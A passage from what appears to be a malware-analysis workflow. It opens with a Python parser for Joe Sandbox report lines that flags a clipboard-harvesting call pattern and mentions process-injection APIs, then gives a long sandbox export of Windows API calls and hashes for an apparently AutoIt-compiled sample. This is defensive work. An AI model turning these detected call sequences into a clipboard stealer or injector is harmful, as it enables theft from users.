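# One report line: optional bullet, optional "Part of subcall function X:" prefix,
# then API.MODULE, optional (args), then "ref: <8 hex digits>".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Standard clipboard format identifiers from the Windows SDK (winuser.h).
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0x2: "CF_BITMAP", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}


def decode_arg(arg):
    """Turn a printed argument into an int; '?' (unrecovered) becomes None,
    non-numeric text such as a class name is returned unchanged."""
    if arg == "?":
        return None
    try:
        return int(arg, 16)
    except ValueError:
        return arg


def parse_api_lines(text):
    """Parse report lines into dicts {api, module, args, ref}; skip non-API lines."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def clipboard_reads(calls):
    """List (ref, format name) for every GetClipboardData call in the function."""
    out = []
    for c in calls:
        if c["api"] == "GetClipboardData" and c["args"]:
            fmt = decode_arg(c["args"][0])
            name = CLIPBOARD_FORMATS.get(fmt, "unknown" if fmt is None else f"0x{fmt:X}")
            out.append((c["ref"], name))
    return out


def matches_clipboard_harvest(calls):
    """Heuristic (assumption of this example): OpenClipboard, then GetClipboardData,
    then GlobalLock, in ascending address order, marks a clipboard read routine."""
    wanted = ["OpenClipboard", "GetClipboardData", "GlobalLock"]
    idx = 0
    for c in sorted(calls, key=lambda c: c["ref"]):
        if c["api"] == wanted[idx]:
            idx += 1
            if idx == len(wanted):
                return True
    return False


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LISTING)
    for ref, fmt in clipboard_reads(parsed):
        print(f"{ref:08X}: GetClipboardData({fmt})")
    print("clipboard harvest pattern:", matches_clipboard_harvest(parsed))
```

Run against the full report export, the same parser gives a per-function call list that can be grepped for other sequences the signatures point at (for example the SetThreadContext and QueueUserAPC injection steps), without re-reading the disassembly by hand.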
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                            • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                            • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                            • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                            • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                            • String ID: ($,$tooltips_class32
                                                                                                                            • API String ID: 541082891-3320066284
                                                                                                                            • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                            • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                            • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                            • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                            APIs
                                                                                                                            • _wcslen.LIBCMT ref: 00454DCF
                                                                                                                            • _wcslen.LIBCMT ref: 00454DE2
                                                                                                                            • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                                                            • _wcslen.LIBCMT ref: 00454E04
                                                                                                                            • __wcsicoll.LIBCMT ref: 00454E11
                                                                                                                            • _wcslen.LIBCMT ref: 00454E24
                                                                                                                            • __wcsicoll.LIBCMT ref: 00454E31
                                                                                                                              • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                            • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                            • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                            • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                            • String ID: .dll$.exe$.icl$#v
                                                                                                                            • API String ID: 2511167534-1852478350
                                                                                                                            • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                            • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                            • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                            • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                            APIs
                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                            • _wcslen.LIBCMT ref: 00436B79
                                                                                                                            • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                                            • _wcscat.LIBCMT ref: 00436BC0
                                                                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                            • _wcscat.LIBCMT ref: 00436C2A
                                                                                                                            • _wcscat.LIBCMT ref: 00436C31
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                            • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                            • API String ID: 1503153545-1459072770
                                                                                                                            • Opcode ID: da048ba66ce88b48ef30bdef6a2df63bad05d76c483f80e633b4d0ed67bbdd23
                                                                                                                            • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                            • Opcode Fuzzy Hash: da048ba66ce88b48ef30bdef6a2df63bad05d76c483f80e633b4d0ed67bbdd23
                                                                                                                            • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                            • _fseek.LIBCMT ref: 004527FC
                                                                                                                            • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                            • _wcscpy.LIBCMT ref: 00452871
                                                                                                                            • _wcscat.LIBCMT ref: 00452886
                                                                                                                            • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                            • _wcscat.LIBCMT ref: 004528C8
                                                                                                                            • _wcscat.LIBCMT ref: 004528DD
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                            • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2054058615-0
                                                                                                                            • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                            • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                            • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                            • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 0-4108050209
                                                                                                                            • Opcode ID: e06975847f9587479798518a9de21672e2e0b2e771e0c485f95415178a901e8a
                                                                                                                            • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                            • Opcode Fuzzy Hash: e06975847f9587479798518a9de21672e2e0b2e771e0c485f95415178a901e8a
                                                                                                                            • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2353593579-4108050209
                                                                                                                            • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                            • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                            • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                            • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32 ref: 0044A11D
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                            • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                            • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                            • GetWindowDC.USER32 ref: 0044A277
                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                            • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
• String ID:
• API String ID: 1744303182-0
• Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
• Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
• Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
• Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 790654849-1810252412
• Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
• Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
• Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
• Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
Strings
Similarity
• API ID:
• String ID: >>>AUTOIT SCRIPT<<<$\
• API String ID: 0-1896584978
• Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
• Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
• Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
• Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
APIs
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
• Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
• Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
• Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
• Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• GetForegroundWindow.USER32(?,?), ref: 0046D7C1
• GetForegroundWindow.USER32 ref: 0046DBA4
• IsWindow.USER32(?), ref: 0046DBDE
• GetDesktopWindow.USER32 ref: 0046DCB5
• EnumChildWindows.USER32(00000000), ref: 0046DCBC
• EnumWindows.USER32(00460772,?), ref: 0046DCC4
  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
Strings
Similarity
• API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
• String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
• API String ID: 1322021666-1919597938
• Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
• Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
• Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
• Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
APIs
• GetLocalTime.KERNEL32(?), ref: 0045DED4
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
• _wcsncpy.LIBCMT ref: 0045DF0F
• __wsplitpath.LIBCMT ref: 0045DF54
• _wcscat.LIBCMT ref: 0045DF6C
• _wcscat.LIBCMT ref: 0045DF7E
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
• _wcscpy.LIBCMT ref: 0045E019
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
Strings
Similarity
• API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 3201719729-438819550
• Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
• Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
• Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
• Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
APIs
Strings
Similarity
• API ID: __wcsicoll$IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2485277191-404129466
• Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
• Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
APIs
• CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
• GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
• strncnt.LIBCMT ref: 00428646
• strncnt.LIBCMT ref: 0042865A
Similarity
• API ID: strncnt$CompareErrorLastString
• String ID:
• API String ID: 1776594460-0
• Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
• Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
• Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
• Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                            APIs
                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                            • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3869813825-0
                                                                                                                            • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
